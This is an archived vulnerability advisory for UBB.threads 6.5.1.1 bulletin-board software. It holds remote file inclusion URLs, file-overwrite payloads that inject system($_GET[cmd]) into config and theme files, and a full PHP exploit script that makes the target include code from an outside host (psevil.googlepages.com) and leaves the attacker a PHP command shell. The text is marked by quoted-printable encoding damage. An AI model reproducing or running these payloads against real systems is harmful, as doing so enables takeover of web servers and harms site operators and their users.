Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: b06-4987.htm

UBB.threads Multiple input validation error



UBB.threads Multiple input validation error
UBB.threads Multiple input validation error



Hello,,=0D
=0D
UBB.threads Multiple input validation error=0D
=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D 
Email Address : security@soqor.net=0D 
=0D
Tested on Version 6 (6.5.1.1) and other versions maybe affected=0D
=0D
=0D
Remote File including :=0D
ubbt.inc.php?GLOBALS[thispath]=http://localhost/cmd.txt?&cmd=dir=0D 
ubbt.inc.php?GLOBALS[configdir]=http://localhost/cmd.txt?&cmd=dir=0D 
-------------------------------------------------------=0D
Files overwrite vulnerabilities=0D
if magic_qoutes_gpc = off=0D
=0D
admin/doedittheme.php?theme[soqor]=".system($_GET[cmd])."&thispath=../=0D
and open =0D
includes/theme.inc.php?cmd=ls -la=0D
or :-=0D
admin/doeditconfig.php?config[soqor]=".system($_GET[cmd])."&thispath=../=0D
and open=0D
includes/config.inc.php?cmd=ls -la=0D
=0D
-- # -- # -- # --=0D
=0D
if magic_qoutes_gpc = on=0D
admin/doeditconfig.php?thispath=../includes&config[path]=http://psevil.googlepages.com/cmd.txt?=0D 
=0D
and you will have a command execution files ..=0D
example=0D
dorateuser.php?cmd=ls -la=0D
calendar.php?cmd=ls -la=0D
and so many other files which includes using this variable ($config[path])=0D
-------------------------------------------------------=0D
=0D
Full path=0D
cron/php/subscriptions.php=0D
=0D
-------------------------------------------------------=0D
Exploit :-=0D
=0D
#!/usr/bin/php -q -d short_open_tag=on=0D
WwW.SoQoR.NeT=0D 
*/=0D
print_r('=0D
/**********************************************/=0D
/*       UBB.threads Command Execution        */=0D
/* by HACKERS PAL  */=0D 
/* site: http://www.soqor.net */');=0D 
if ($argc<2) {=0D
print_r('=0D
/* --                                         */=0D
/* Usage: php '.$argv[0].' host=0D
/* Example:                                   */=0D
/* php '.$argv[0].' http://localhost/=0D 
/**********************************************/=0D
');=0D
die;=0D
}=0D
error_reporting(0);=0D
ini_set("max_execution_time",0);=0D
=0D
$url=$argv[1]."/";=0D
$exploit="admin/doeditconfig.php?thispath=../includes&config[path]=http://psevil.googlepages.com/cmd.txt?";=0D 
$page=$url.$exploit;=0D
         Function get_page($url)=0D
         {=0D
=0D
                  if(function_exists("file_get_contents"))=0D
                  {=0D
=0D
                       $contents = file_get_contents($url);=0D
=0D
                          }=0D
                          else=0D
                          {=0D
                              $fp=fopen("$url","r");=0D
                              while($line=fread($fp,1024))=0D
                              {=0D
                               $contents=$contents.$line;=0D
                              }=0D
=0D
=0D
                                  }=0D
                       return $contents;=0D
         }=0D
=0D
     $page    = get_page($page);=0D
=0D
     $newpage = get_page($url."calendar.php");=0D
=0D
     if(eregi("Cannot execute a blank command",$newpage))=0D
     {=0D
Die("\n[+] Exploit Finished\n[+] Go To : ".$url."calendar.php?cmd=ls -la\n[+] You Got Your Own PHP Shell\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D 
             }=0D
             Else=0D
             {=0D
Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");=0D 
                }=0D
?>=0D
=0D
WwW.SoQoR.NeT 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH